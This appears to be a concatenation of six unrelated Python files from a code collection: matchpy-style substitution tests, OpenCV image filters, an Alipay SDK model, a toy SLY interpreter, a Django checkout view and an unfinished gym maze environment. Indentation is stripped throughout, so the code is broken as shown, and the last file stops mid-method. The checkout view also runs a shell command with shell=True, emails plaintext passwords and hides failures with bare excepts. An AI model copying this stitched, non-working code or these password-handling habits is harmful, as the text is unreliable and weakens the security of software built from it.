(y_, {'x': b}, y_, False),
(f(x_), {'x': b}, f(b), True),
(f(x_), {'y': b}, f(x_), False),
(f(x_), {}, f(x_), False),
(f(a, x_), {'x': b}, f(a, b), True),
(f(x_), {'x': [a, b]}, f(a, b), True),
(f(x_), {'x': []}, f(), True),
(f(x_, c), {'x': [a, b]}, f(a, b, c), True),
(f(x_, y_), {'x': a, 'y': b}, f(a, b), True),
(f(x_, y_), {'x': [a, c], 'y': b}, f(a, c, b), True),
(f(x_, y_), {'x': a, 'y': [b, c]}, f(a, b, c), True),
(Pattern(f(x_)), {'x': a}, f(a), True)
]
) # yapf: disable
def test_substitute(self, expression, substitution, expected_result, replaced):
result = substitute(expression, substitution)
assert result == expected_result, "Substitution did not yield expected result"
if replaced:
assert result is not expression, "When substituting, the original expression may not be modified"
else:
assert result is expression, "When nothing is substituted, the original expression has to be returned"
def many_replace_wrapper(expression, position, replacement):
return replace_many(expression, [(position, replacement)])
class TestReplaceTest:
@pytest.mark.parametrize('replace', [replace, many_replace_wrapper])
@pytest.mark.parametrize(
' expression, position, replacement, expected_result',
[
(a, (), b, b),
(f(a), (), b, b),
(a, (), f(b), f(b)),
(f(a), (), f(b), f(b)),
(f(a), (0, ), b, f(b)),
(f(a, b), (0, ), c, f(c, b)),
(f(a, b), (1, ), c, f(a, c)),
(f(a), (0, ), [b, c], f(b, c)),
(f(a, b), (0, ), [b, c], f(b, c, b)),
(f(a, b), (1, ), [b, c], f(a, b, c)),
(f(f(a)), (0, ), b, f(b)),
(f(f(a)), (0, 0), b, f(f(b))),
(f(f(a, b)), (0, 0), c, f(f(c, b))),
(f(f(a, b)), (0, 1), c, f(f(a, c))),
(f(f(a, b), f(a, b)), (0, 0), c, f(f(c, b), f(a, b))),
(f(f(a, b), f(a, b)), (0, 1), c, f(f(a, c), f(a, b))),
(f(f(a, b), f(a, b)), (1, 0), c, f(f(a, b), f(c, b))),
(f(f(a, b), f(a, b)), (1, 1), c, f(f(a, b), f(a, c))),
(f(f(a, b), f(a, b)), (0, ), c, f(c, f(a, b))),
(f(f(a, b), f(a, b)), (1, ), c, f(f(a, b), c)),
]
) # yapf: disable
def test_substitution_match(self, replace, expression, position, replacement, expected_result):
result = replace(expression, position, replacement)
assert result == expected_result, "Replacement did not yield expected result ({!r} {!r} -> {!r})".format(
expression, position, replacement
)
assert result is not expression, "Replacement modified the original expression"
@pytest.mark.parametrize('replace', [replace, many_replace_wrapper])
def test_too_big_position_error(self, replace):
with pytest.raises(IndexError):
replace(a, (0, ), b)
with pytest.raises(IndexError):
replace(f(a), (0, 0), b)
with pytest.raises(IndexError):
replace(f(a), (1, ), b)
with pytest.raises(IndexError):
replace(f(a, b), (2, ), b)
class TestReplaceManyTest:
@pytest.mark.parametrize(
' expression, replacements, expected_result',
[
(f(a, b), [((0, ), b), ((1, ), a)], f(b, a)),
(f(a, b), [((0, ), [c, c]), ((1, ), a)], f(c, c, a)),
(f(a, b), [((0, ), b), ((1, ), [c, c])], f(b, c, c)),
(f(f2(a, b), c), [((0, 0), b), ((0, 1), a)], f(f2(b, a), c)),
(f_c(c, f2(a, b)), [((1, 0), b), ((1, 1), a)], f_c(c, f2(b, a))),
(f(f2(a, b), f2(c)), [((1, 0), b), ((0, 1), a)], f(f2(a, a), f2(b))),
(f(f2(a, b), f2(c)), [((0, 1), a), ((1, 0), b)], f(f2(a, a), f2(b))),
(f_c(f2(c), f2(a, b)), [((0, 0), b), ((1, 1), a)], f_c(f2(b), f2(a, a))),
(f_c(f2(c), f2(a, b)), [((1, 1), a), ((0, 0), b)], f_c(f2(b), f2(a, a))),
]
) # yapf: disable
def test_substitution_match(self, expression, replacements, expected_result):
result = replace_many(expression, replacements)
assert result == expected_result, "Replacement did not yield expected result ({!r} -> {!r})".format(
expression, replacements
)
assert result is not expression, "Replacement modified the original expression"
def test_inconsistent_position_error(self):
with pytest.raises(IndexError):
replace_many(f(a), [((), b), ((0, ), b)])
with pytest.raises(IndexError):
replace_many(a, [((), b), ((0, ), b)])
with pytest.raises(IndexError):
replace_many(a, [((0, ), b), ((1, ), b)])
def test_empty_replace(self):
expression = f(a, b)
result = replace_many(expression, [])
assert expression is result, "Empty replacements should not change the expression."
@pytest.mark.parametrize(
' expression, pattern, expected_results',
[ # Substitution Position
(f(a), f(x_), [({'x': a}, ())]),
(f(a), x_, [({'x': f(a)}, ()),
({'x': a}, (0, ))]),
(f(a, f2(b), f2(f2(c), f2(a), f2(f2(b))), f2(c), c), f2(x_), [({'x': b}, (1, )),
({'x': c}, (2, 0)),
({'x': a}, (2, 1)),
({'x': f2(b)}, (2, 2)),
({'x': b}, (2, 2, 0)),
({'x': c}, (3, ))])
]
) # yapf: disable
def test_match_anywhere(expression, pattern, expected_results):
expression = expression
pattern = Pattern(pattern)
results = list(match_anywhere(expression, pattern))
assert len(results) == len(expected_results), "Invalid number of results"
for result in expected_results:
assert result in results, "Results differ from expected"
def test_match_anywhere_error():
with pytest.raises(ValueError):
next(match_anywhere(f(x_), f(x_)))
def test_match_error():
with pytest.raises(ValueError):
next(match_one_to_one(f(x_), f(x_)))
def _many_to_one_replace(expression, rules):
return ManyToOneReplacer(*rules).replace(expression)
@pytest.mark.parametrize(
'replacer', [replace_all, _many_to_one_replace]
)
def test_logic_simplify(replacer):
LAnd = Operation.new('and', Arity.variadic, 'LAnd', associative=True, one_identity=True, commutative=True)
LOr = Operation.new('or', Arity.variadic, 'LOr', associative=True, one_identity=True, commutative=True)
LXor = Operation.new('xor', Arity.variadic, 'LXor', associative=True, one_identity=True, commutative=True)
LNot = Operation.new('not', Arity.unary, 'LNot')
LImplies = Operation.new('implies', Arity.binary, 'LImplies')
Iff = Operation.new('iff', Arity.binary, 'Iff')
___ = Wildcard.star()
a1 = Symbol('a1')
a2 = Symbol('a2')
a3 = Symbol('a3')
a4 = Symbol('a4')
a5 = Symbol('a5')
a6 = Symbol('a6')
a7 = Symbol('a7')
a8 = Symbol('a8')
a9 = Symbol('a9')
a10 = Symbol('a10')
a11 = Symbol('a11')
LBot = Symbol(u'⊥')
LTop = Symbol(u'⊤')
expression = LImplies(
LAnd(
Iff(
Iff(LOr(a1, a2), LOr(LNot(a3), Iff(LXor(a4, a5), LNot(LNot(LNot(a6)))))),
LNot(
LAnd(
LAnd(a7, a8),
LNot(
LXor(
LXor(LOr(a9, LAnd(a10, a11)), a2),
LAnd(LAnd(a11, LXor(a2, Iff(a5, a5))), LXor(LXor(a7, a7), Iff(a9, a4)))
)
)
)
)
),
LImplies(
Iff(
Iff(LOr(a1, a2), LOr(LNot(a3), Iff(LXor(a4, a5), LNot(LNot(LNot(a6)))))),
LNot(
LAnd(
LAnd(a7, a8),
LNot(
LXor(
LXor(LOr(a9, LAnd(a10, a11)), a2),
LAnd(LAnd(a11, LXor(a2, Iff(a5, a5))), LXor(LXor(a7, a7), Iff(a9, a4)))
)
)
)
)
),
LNot(
LAnd(
LImplies(
LAnd(a1, a2),
LNot(
LXor(
LOr(
LOr(
LXor(LImplies(LAnd(a3, a4), LImplies(a5, a6)), LOr(a7, a8)),
LXor(Iff(a9, a10), a11)
), LXor(LXor(a2, a2), a7)
), Iff(LOr(a4, a9), LXor(LNot(a6), a6))
)
)
), LNot(Iff(LNot(a11), LNot(a9)))
)
)
)
),
LNot(
LAnd(
LImplies(
LAnd(a1, a2),
LNot(
LXor(
LOr(
LOr(
LXor(LImplies(LAnd(a3, a4), LImplies(a5, a6)), LOr(a7, a8)),
LXor(Iff(a9, a10), a11)
), LXor(LXor(a2, a2), a7)
), Iff(LOr(a4, a9), LXor(LNot(a6), a6))
)
)
), LNot(Iff(LNot(a11), LNot(a9)))
)
)
)
rules = [
# xor(x,⊥) → x
ReplacementRule(
Pattern(LXor(x__, LBot)),
lambda x: LXor(*x)
),
# xor(x, x) → ⊥
ReplacementRule(
Pattern(LXor(x_, x_, ___)),
lambda x: LBot
),
# and(x,⊤) → x
ReplacementRule(
Pattern(LAnd(x__, LTop)),
lambda x: LAnd(*x)
),
# and(x,⊥) → ⊥
ReplacementRule(
Pattern(LAnd(__, LBot)),
lambda: LBot
),
# and(x, x) → x
ReplacementRule(
Pattern(LAnd(x_, x_, y___)),
lambda x, y: LAnd(x, *y)
),
# and(x, xor(y, z)) → xor(and(x, y), and(x, z))
ReplacementRule(
Pattern(LAnd(x_, LXor(y_, z_))),
lambda x, y, z: LXor(LAnd(x, y), LAnd(x, z))
),
# implies(x, y) → not(xor(x, and(x, y)))
ReplacementRule(
Pattern(LImplies(x_, y_)),
lambda x, y: LNot(LXor(x, LAnd(x, y)))
),
# not(x) → xor(x,⊤)
ReplacementRule(
Pattern(LNot(x_)),
lambda x: LXor(x, LTop)
),
# or(x, y) → xor(and(x, y), xor(x, y))
ReplacementRule(
Pattern(LOr(x_, y_)),
lambda x, y: LXor(LAnd(x, y), LXor(x, y))
),
# iff(x, y) → not(xor(x, y))
ReplacementRule(
Pattern(Iff(x_, y_)),
lambda x, y: LNot(LXor(x, y))
),
] # yapf: disable
result = replacer(expression, rules)
assert result == LBot
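# Hedged standalone sketch (not one of the tests above): the same rewrite API
# on a tiny system, to show the mechanics of a single rule in isolation;
# g and bot are local example names.
def _tiny_rewrite_example():
    g = Operation.new('g', Arity.variadic, 'g', associative=True, commutative=True)
    bot = Symbol('bot')
    x = Wildcard.dot('x')
    rule = ReplacementRule(Pattern(g(x, x)), lambda x: bot)  # g(x, x) -> bot
    return replace_all(g(Symbol('p'), Symbol('p')), [rule])  # evaluates to bot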
|
py | 1a37f5ecb6e695f4680326bd7500943ed77bbd6f | import cv2
import numpy as np
import os
from matplotlib import pyplot
def edit():
#Read the image
image = cv2.imread('Media/sample.jpg')
#greyscale filter
def greyscale(img):
greyscale = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
return greyscale
# brightness adjustment
def bright(img, beta_value ):
img_bright = cv2.convertScaleAbs(img, beta=beta_value)
return img_bright
#sharp effect
def sharpen(img):
kernel = np.array([[-1, -1, -1], [-1, 9.5, -1], [-1, -1, -1]])
img_sharpen = cv2.filter2D(img, -1, kernel)
return img_sharpen
#sepia effect
def sepia(img):
img_sepia = np.array(img, dtype=np.float64) # converting to float to prevent loss
img_sepia = cv2.transform(img_sepia, np.matrix([[0.272, 0.534, 0.131],
[0.349, 0.686, 0.168],
                                                [0.393, 0.769, 0.189]])) # multiplying image with special sepia matrix
img_sepia[np.where(img_sepia > 255)] = 255 # normalizing values greater than 255 to 255
img_sepia = np.array(img_sepia, dtype=np.uint8)
return img_sepia
#grey pencil sketch effect
def pencil_sketch_grey(img):
#inbuilt function to create sketch effect in colour and greyscale
sk_gray, sk_color = cv2.pencilSketch(img, sigma_s=60, sigma_r=0.07, shade_factor=0.1)
return sk_gray
#colour pencil sketch effect
def pencil_sketch_col(img):
#inbuilt function to create sketch effect in colour and greyscale
sk_gray, sk_color = cv2.pencilSketch(img, sigma_s=60, sigma_r=0.07, shade_factor=0.1)
return sk_color
#HDR effect
def HDR(img):
hdr = cv2.detailEnhance(img, sigma_s=12, sigma_r=0.15)
return hdr
# invert filter
def invert(img):
inv = cv2.bitwise_not(img)
return inv
#defining a function
from scipy.interpolate import UnivariateSpline
def LookupTable(x, y):
spline = UnivariateSpline(x, y)
return spline(range(256))
#summer effect
def Summer(img):
increaseLookupTable = LookupTable([0, 64, 128, 256], [0, 80, 160, 256])
decreaseLookupTable = LookupTable([0, 64, 128, 256], [0, 50, 100, 256])
blue_channel, green_channel, red_channel = cv2.split(img)
red_channel = cv2.LUT(red_channel, increaseLookupTable).astype(np.uint8)
blue_channel = cv2.LUT(blue_channel, decreaseLookupTable).astype(np.uint8)
sum= cv2.merge((blue_channel, green_channel, red_channel ))
return sum
#winter effect
def Winter(img):
increaseLookupTable = LookupTable([0, 64, 128, 256], [0, 80, 160, 256])
decreaseLookupTable = LookupTable([0, 64, 128, 256], [0, 50, 100, 256])
blue_channel, green_channel, red_channel = cv2.split(img)
red_channel = cv2.LUT(red_channel, decreaseLookupTable).astype(np.uint8)
blue_channel = cv2.LUT(blue_channel, increaseLookupTable).astype(np.uint8)
win= cv2.merge((blue_channel, green_channel, red_channel))
return win
#making the greyscale image
a1 = greyscale(image)
filename = 'greyscale.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a1)
#making the more bright image
#positive beta value
a2 = bright(image, 60)
filename = 'more_bright.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a2)
#making the less bright image
#negative beta value
a3 = bright(image, -60)
filename = 'less_bright.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a3)
#making the sharp image
a4 = sharpen(image)
filename = 'sharpen.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a4)
#making the sepia image
a5 = sepia(image)
filename = 'sepia.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a5)
#making the grey pencil sketch
a6 = pencil_sketch_grey(image)
filename = 'pencil_grey.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a6)
#making the colour pencil sketch
a7 = pencil_sketch_col(image)
filename = 'pencil_col.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a7)
#making the hdr img
a8 = HDR(image)
filename = 'HDR.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a8)
#making the invert img
a9 = invert(image)
filename = 'invert.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a9)
#making the summer img
a11 = Summer(image)
filename = 'Summer.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a11)
#making the winter img
a10 = Winter(image)
filename = 'Winter.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a10)
os.startfile('Edited') |
py | 1a37f7d16ced6b916f69d1e9b62ff50f6f0fd322 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class KoubeiMarketingCampaignMemberRelationUnbindModel(object):
def __init__(self):
self._member_template_id = None
self._out_member_no = None
self._request_id = None
self._user_id = None
@property
def member_template_id(self):
return self._member_template_id
@member_template_id.setter
def member_template_id(self, value):
self._member_template_id = value
@property
def out_member_no(self):
return self._out_member_no
@out_member_no.setter
def out_member_no(self, value):
self._out_member_no = value
@property
def request_id(self):
return self._request_id
@request_id.setter
def request_id(self, value):
self._request_id = value
@property
def user_id(self):
return self._user_id
@user_id.setter
def user_id(self, value):
self._user_id = value
def to_alipay_dict(self):
params = dict()
if self.member_template_id:
if hasattr(self.member_template_id, 'to_alipay_dict'):
params['member_template_id'] = self.member_template_id.to_alipay_dict()
else:
params['member_template_id'] = self.member_template_id
if self.out_member_no:
if hasattr(self.out_member_no, 'to_alipay_dict'):
params['out_member_no'] = self.out_member_no.to_alipay_dict()
else:
params['out_member_no'] = self.out_member_no
if self.request_id:
if hasattr(self.request_id, 'to_alipay_dict'):
params['request_id'] = self.request_id.to_alipay_dict()
else:
params['request_id'] = self.request_id
if self.user_id:
if hasattr(self.user_id, 'to_alipay_dict'):
params['user_id'] = self.user_id.to_alipay_dict()
else:
params['user_id'] = self.user_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = KoubeiMarketingCampaignMemberRelationUnbindModel()
if 'member_template_id' in d:
o.member_template_id = d['member_template_id']
if 'out_member_no' in d:
o.out_member_no = d['out_member_no']
if 'request_id' in d:
o.request_id = d['request_id']
if 'user_id' in d:
o.user_id = d['user_id']
return o
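# Hedged round-trip sketch: to_alipay_dict and from_alipay_dict are inverses
# for plain string fields; the IDs below are made up for illustration.
#   m = KoubeiMarketingCampaignMemberRelationUnbindModel()
#   m.member_template_id = '20170101234'
#   m.user_id = '2088000000000000'
#   d = m.to_alipay_dict()   # {'member_template_id': '20170101234', 'user_id': ...}
#   m2 = KoubeiMarketingCampaignMemberRelationUnbindModel.from_alipay_dict(d)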
|
py | 1a37f8306327236dbc180c4317266626d394ba8d | from sly import Lexer
from sly import Parser
import sys
#--------------------------
# While Loop
# Del Var
# Print stmt
# EQEQ, LEQ
#--------------------------
class BasicLexer(Lexer):
tokens = { NAME, NUMBER, STRING, IF, FOR, PRINT, CREATEFILE, WRITE, EQEQ, TO, THING}
ignore = '\t '
literals = { '=', '+', '-', '/', '*', '(', ')', ',', ';', ':', '.'}
# Define tokens
IF = r'if'
#FUN = r'function'
FOR = r'for'
TO = r','
PRINT = r'PRINT'
CREATEFILE = r'createfile'
WRITE = 'write'
THING = r'@[a-zA-Z_][a-zA-Z0-9_]*'
NAME = r'[a-zA-Z_][a-zA-Z0-9_]*'
STRING = r'\".*?\"'
EQEQ = r'=='
@_(r'\d+')
def NUMBER(self, t):
t.value = int(t.value)
return t
@_(r'#.*')
def COMMENT(self, t):
pass
#@_(r'@[a-zA-Z_][a-zA-Z0-9_]*')
#def thing(self, t):
# return t
@_(r'\n+')
def newline(self,t ):
        self.lineno += t.value.count('\n')
class BasicParser(Parser):
debugfile = 'parser.out'
tokens = BasicLexer.tokens
precedence = (
('left', '+', '-'),
('left', '*', '/'),
('right', 'UMINUS'),
)
def __init__(self):
self.env = { }
@_('')
def statement(self, p):
pass
    # TODO: update the syntax
@_('NAME "(" ")" ":" statement')
def statement(self, p):
return ('fun_def', p.NAME, p.statement)
@_('FOR "(" var_assign TO expr ")" ":" statement')
def statement(self, p):
return ('for_loop', ('for_loop_setup', p.var_assign, p.expr), p.statement)
@_('IF "(" condition ")" ":" statement')
def statement(self, p):
return ('if_stmt', p.condition, p.statement)
@_('NAME "(" ")"')
def statement(self, p):
return ('fun_call', p.NAME)
@_('var_assign')
def statement(self, p):
return p.var_assign
@_('NAME "=" STRING')
def var_assign(self, p):
return ('var_assign', p.NAME, p.STRING)
@_('NAME "=" statement')
def var_assign(self, p):
return ('var_assign', p.NAME, p.statement)
@_('PRINT "(" things ")"')
def statement(self, p):
return ('print_stmt', *p.things)
@_('things TO THING')
def things(self, p):
p.things.append(p.THING)
return p.things
@_('THING')
def things(self, p):
        return [p.THING]
@_('CREATEFILE "(" STRING ")"')
def statement(self, p):
return ('createfile_stmt', p.STRING)
@_('STRING "." WRITE "(" STRING ")"')
def statement(self, p):
        return ('write_to_file_stmt', p.STRING0, p.STRING1)
@_('expr')
def statement(self, p):
return (p.expr)
@_('expr "+" expr')
def expr(self, p):
return ('add', p.expr0, p.expr1)
@_('expr "-" expr')
def expr(self, p):
return ('sub', p.expr0, p.expr1)
@_('expr "*" expr')
def expr(self, p):
return ('mul', p.expr0, p.expr1)
@_('expr "/" expr')
def expr(self, p):
return ('div', p.expr0, p.expr1)
@_('expr EQEQ expr')
def condition(self, p):
return ('condition_eqeq', p.expr0, p.expr1)
@_('"-" expr %prec UMINUS')
def expr(self, p):
return p.expr
@_('NAME')
def expr(self, p):
return ('var', p.NAME)
@_('NUMBER')
def expr(self, p):
return ('num', p.NUMBER)
class BasicExecute:
def __init__(self, tree, env):
self.env = env
result = self.walkTree(tree)
#print(env)
if result is not None and isinstance(result, int):
print(result)
if isinstance(result, str) and result[0] == '"':
print(result)
def walkTree(self, node):
if isinstance(node, int):
return node
if isinstance(node, str):
return node
if node is None:
return None
if node[0] == 'program':
if node[1] == None:
self.walkTree(node[2])
else:
self.walkTree(node[1])
self.walkTree(node[2])
if node[0] == 'num':
return node[1]
if node[0] == 'str':
return node[1]
if node[0] == 'if_stmt':
result = self.walkTree(node[1])
if result:
return self.walkTree(node[1][1])
if node[0] == 'fun_def':
self.env[node[1]] = node[2]
if node[0] == 'fun_call':
try:
return self.walkTree(self.env[node[1]])
except LookupError:
print("Undefined function '%s'" % node[1])
return 0
if node[0] == 'add':
return self.walkTree(node[1]) + self.walkTree(node[2])
elif node[0] == 'sub':
return self.walkTree(node[1]) - self.walkTree(node[2])
elif node[0] == 'mul':
return self.walkTree(node[1]) * self.walkTree(node[2])
elif node[0] == 'div':
return self.walkTree(node[1]) / self.walkTree(node[2])
if node[0] == 'condition_eqeq':
return self.walkTree(node[1]) == self.walkTree(node[2])
if node[0] == 'var_assign':
self.env[node[1]] = self.walkTree(node[2])
return node[1]
if node[0] == 'var':
try:
return self.env[node[1]]
except LookupError:
print("Undefined variable '"+node[1]+"' found!")
return 0
if node[0] == 'for_loop':
if node[1][0] == 'for_loop_setup':
loop_setup = self.walkTree(node[1])
#searches for the var in the env and gets it's value
loop_count = self.env[loop_setup[0]]
loop_limit = loop_setup[1]
for i in range(loop_count+1, loop_limit+1):
res = self.walkTree(node[2])
self.env[loop_setup[0]] = i
del self.env[loop_setup[0]]
if node[0] == 'for_loop_setup':
return (self.walkTree(node[1]), self.walkTree(node[2]))
if node[0] == 'print_stmt':
res = self.walkTree(node[1])
print(res)
if node[0] == 'print_stmt_string':
res = self.walkTree(node[1][1:-1])
print(res)
if node[0] == 'createfile_stmt':
file : str = self.walkTree(node[1][1:-1])
with open(file, 'a') as f:
pass
#node 1 2
if node[0] == 'write_to_file_stmt':
print(node[2])
try:
file : str = self.walkTree(node[1][1:-1])
with open(file, 'w') as f:
f.write(self.walkTree(node[2][1:-1]))
except LookupError:
print("file or dir '"+node[1][1:-1]+"' not found!")
return 0
if __name__ == '__main__':
lexer = BasicLexer()
parser = BasicParser()
env = {}
try:
file : str = sys.argv[1]
try:
with open(file, 'r', encoding="utf-8") as f:
line : str
for line in f:
try:
text = line
except EOFError:
break
if text:
tree = parser.parse(lexer.tokenize(text))
BasicExecute(tree, env)
except:
print('the specified file "{}" was not found!'.format(file))
except:
while True:
try:
text = input('haya development edition > ')
except EOFError:
break
if text:
tree = parser.parse(lexer.tokenize(text))
BasicExecute(tree, env)
#parsetree = parser.parse(lexer.tokenize(text))
#print(parsetree)
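# Hedged examples of source lines the grammar above accepts (names arbitrary):
#   x = 5
#   for (i = 0, 10) : x = x + 1
#   if (x == 11) : x = 0
#   createfile("out.txt")
#   "out.txt".write("hello")
#   PRINT(@x)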
|
py | 1a37f8a6bbc075dac51e27aaef684cdb14f21f0c | from __future__ import print_function
import random
import string
import subprocess
import time
from configparser import SafeConfigParser
import MySQLdb
from django.contrib.auth.mixins import LoginRequiredMixin
from django.core.mail import EmailMessage
from django.http import JsonResponse
from django.views.generic import View
from billing.models import Transaction, ItemCount, RestrictedRequest
from digitalmarket.mixins import AjaxRequiredMixin
from notifications.models import NotificationItem
from flows.models import Flow
#NP_PATH = '/home/zxc/Desktop/frontend/src/np'
#CHECKOUT_LOG_PATH = '/home/zxc/Desktop/checkout_log'
class CheckoutAjaxView(LoginRequiredMixin, AjaxRequiredMixin, View):
"""
View for the checkout function
Add password, send email, send notification, send flow, deal with restricted permission
"""
# Added: sending message to the broker
def _sendAdminEmail(self, user, seller, topic, prod_num, message, request_file, restricted_active, request,
product_obj):
config = SafeConfigParser()
config.read('/code/config.ini')
db = MySQLdb.connect(host=config.get('main', 'mysql_host'), # your host, usually localhost
user=config.get('main', 'mysql_name'), # your username
passwd=config.get('main', 'mysql_pw'), # your password
db=config.get('main', 'mysql_db')) # your database
cur = db.cursor()
log = config.get('main', 'checkout_log_path')
NP_PATH = config.get('main', 'np_path')
username = user.username
user_email = user.email
topic = topic
# Password with 6 characters (lower case + number)
original_password = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(12))
if not cur.execute("select (1) from users where username = %s limit 1", (username,)):
command = NP_PATH + ' ' + '-p' + ' ' + original_password
command_bytes = command.encode('utf-8')
pw_bytes = subprocess.Popen(command_bytes, stdout=subprocess.PIPE, shell=True).communicate()[0]
password = pw_bytes.decode().rstrip('\n')
cur.execute("insert into users (username,pw,user_id) values (%s,%s,%s)",
(username, password, user.id)) # stdout: ignore '\n'
# Send password to email
subject = 'Your new password'
msg = "Your password to I3 is: " + original_password
email = EmailMessage(subject, msg, to=[user_email])
email.send()
# Record email as notification
notification_box = request.user.get_notification_box()
notification_item = NotificationItem(
notification_box=notification_box,
subject=subject,
body=msg)
notification_item.save()
# To do: make topic as a product obj that can be linked to
flow_obj = Flow.objects.create(
user=request.user,
topic=topic,
direction='in',
state='inactive')
flow_obj.save()
# send to the user which topic is able to pub/sub
# when the topic is unrestricted: insert to acls and send confirmation back to buyer
if not restricted_active:
subject = 'New product purchased'
msg = 'Now you can subscribe to topic: ' + topic + '.'
email = EmailMessage(subject, msg, to=[user_email])
email.send()
# Record email as notification
notification_box = request.user.get_notification_box()
notification_item = NotificationItem(
notification_box=notification_box,
subject=subject,
body=msg)
notification_item.save()
subject = 'New buyer of an unrestricted topic'
msg = 'Buyer ' + username + ' just bought product ' + topic + '.'
email = EmailMessage(subject, msg, to=[seller.email])
email.send()
# Record email as notification
notification_box = seller.get_notification_box()
notification_item = NotificationItem(
notification_box=notification_box,
subject=subject,
body=msg)
notification_item.save()
# insert into acls table
rw = 1 # seller: can read and write
if product_obj.sensor_type >= 2:
rw = 2
cur.execute("insert into acls (username,topic,rw,user_id, topic_id) values (%s,%s,%s,%s,%s)",
(username, topic, str(rw), user.id, product_obj.id))
# write new sub info to log
with open(log, 'a') as f:
f.write(str(time.time()) + ': New Sub ' + username + ' ' + topic + ' ' + str(prod_num) + '\n')
else:
restricted_request_obj = RestrictedRequest(
seller=product_obj.seller,
requester=request.user,
product=product_obj,
price=product_obj.price,
quantity=prod_num,
intention=message,
attachment=request_file
)
restricted_request_obj.save()
subject = 'New product purchased (to be confirmed)'
msg = 'Waiting seller to confirm purchase of ' + topic + '.'
email = EmailMessage(subject, msg, to=[user_email])
email.send()
# Record email as notification
notification_box = request.user.get_notification_box()
notification_item = NotificationItem(
notification_box=notification_box,
subject=subject,
body=msg)
notification_item.save()
subject = 'New buyer of a restricted topic'
msg = 'Buyer ' + username + ' just bought product ' + topic + '. You need to approve the purchase.'
email = EmailMessage(subject, msg, to=[seller.email])
email.send()
# Record email as notification
notification_box = seller.get_notification_box()
notification_item = NotificationItem(
notification_box=notification_box,
subject=subject,
body=msg)
notification_item.save()
db.commit()
def post(self, request, *args, **kwargs):
# TODO: add credit card processing
user = request.user
cart = user.get_cart()
if cart.num_items() == 0:
data = {
'success': False,
'errMsg': 'Your cart is empty'
}
return JsonResponse(data=data)
processed_items = []
for item in cart.all_items():
# TODO: how to handle restricted?
transaction = Transaction(
buyer=request.user,
seller=item.product.seller,
product=item.product,
price=item.product.get_price * item.quantity,
quantity=item.quantity,
)
transaction.save()
item_count = ItemCount(
buyer=request.user,
product=item.product,
order=item.quantity,
quantity=item.quantity,
)
item_count.save()
try:
self._sendAdminEmail(user, item.product.seller, item.product.title, item.quantity,
item.intention, item.attachment, item.product.restricted_active, request,
item.product)
processed_items.append(item)
except:
# TODO: log error, recover, try again?
pass
links = []
for item in processed_items:
download_link = item.product.get_download()
preview_link = download_link + "?preview=True"
link = {
"download": download_link,
"preview": preview_link,
}
links.append(link)
item.delete()
data = {
'success': True,
'links': links
}
return JsonResponse(data=data)
class RequestsAjaxView(LoginRequiredMixin, AjaxRequiredMixin, View):
"""
seller decides whether to approve or decline the buy product request
return Json object for frontend Ajax call
"""
def post(self, request, *args, **kwargs):
request_id = kwargs['pk']
restricted_request = RestrictedRequest.objects.get(pk=request_id)
if restricted_request.seller != request.user:
data = {
'success': False,
'errMsg': 'Request not found',
'errCode': '404'
}
else:
task = kwargs['task']
if task == 'approve':
restricted_request.success = 1
else:
restricted_request.success = 0
restricted_request.replied = True
restricted_request.save()
data = {
'success': True
}
return JsonResponse(data=data)
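# Hedged wiring sketch (paths and names are illustrative, not from this repo);
# RequestsAjaxView reads kwargs['pk'] and kwargs['task'] as captured below:
#   from django.urls import path
#   urlpatterns = [
#       path('checkout/', CheckoutAjaxView.as_view(), name='checkout'),
#       path('requests/<int:pk>/<str:task>/', RequestsAjaxView.as_view(), name='restricted-request'),
#   ]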
|
py | 1a37f9d2731d98e018c6b4208503917077d467ec | import gym
from gym.spaces import Box, Discrete, Tuple
import logging
import random
import numpy as np
logger = logging.getLogger(__name__)
# Agent has to traverse the maze from the starting position S -> F
# Observation space: [x_pos, y_pos]
# Action space: which direction to move (N, E, S, W); the wind mechanic is disabled below
MAP_DATA = """
###########################
# S #
# ### #
# ### #
# ### #
# F #
###########################"""
class MazeEnv(gym.Env):
def __init__(self, env_config={}):
self.map = [m for m in MAP_DATA.split("\n") if m]
self.x_dim = len(self.map)
self.y_dim = len(self.map[0])
logger.info("Loaded map {} {}".format(self.x_dim, self.y_dim))
for x in range(self.x_dim):
for y in range(self.y_dim):
if self.map[x][y] == "S":
self.start_pos = (x, y)
elif self.map[x][y] == "F":
self.end_pos = (x, y)
logger.info("Start pos {} end pos {}".format(self.start_pos,
self.end_pos))
# self.observation_space = Tuple([
# Box(0, 100, shape=(2, )), # (x, y)
# Discrete(4), # wind direction (N, E, S, W)
# ])
self.observation_space = Box(0, 100, shape=(2,))
        self.action_space = Discrete(4)  # direction to move (N, E, S, W)
self.viewer = None
self.h = len(self.map)
self.w = len(self.map[0])
self.frame = 255 * np.ones((self.h, self.w, 3), dtype=np.uint8)
self.bg = 255 * np.ones((self.h, self.w, 3), dtype=np.uint8)
for ridx in range(self.h):
for cidx in range(self.w):
if self.map[ridx][cidx] == "#":
self.bg[ridx, cidx, :] = [255, 0, 0]
self.frame = self.bg.copy()
self.member = None
def reset(self):
# self.wind_direction = random.choice([0, 1, 2, 3])
self.pos = self.start_pos
self.num_steps = 0
return np.array(self.pos)
def step(self, action, verbose=False):
# if action == 1:
# self.pos = self._get_new_pos(self.pos, self.wind_direction)
# self.wind_direction = random.choice([0, 1, 2, 3])
self.pos = self._get_new_pos(self.pos, action)
self.num_steps += 1
